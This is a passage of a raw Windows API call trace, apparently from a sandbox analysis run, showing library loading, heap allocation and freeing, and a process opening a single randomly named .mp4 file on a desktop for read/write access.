[0162.250] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0162.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.250] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0162.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0162.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0162.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0162.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2688 [0162.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2688, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0162.250] FreeLibrary (hLibModule=0x75c90000) returned 1 [0162.251] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0162.251] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0162.251] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0162.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0162.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd738, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0162.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\qPUo-BPNhJloiyjRuI7.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ltz4mbbpxnfpfin1jbh3\\qpuo-bpnhjloiyjrui7.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0162.251] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0162.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0162.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0162.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0162.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9d46e8 | out: hHeap=0x8a0000) returned 1 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0162.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.252] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.252] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0162.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0162.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.253] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.253] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd360 [0162.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0162.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0162.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.254] FreeLibrary (hLibModule=0x75990000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0162.254] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0162.255] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0162.256] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.256] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0162.256] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.256] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0162.257] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0162.257] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6e48 | out: hHeap=0x8a0000) returned 1 [0162.258] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.259] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0162.260] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0162.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0162.260] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 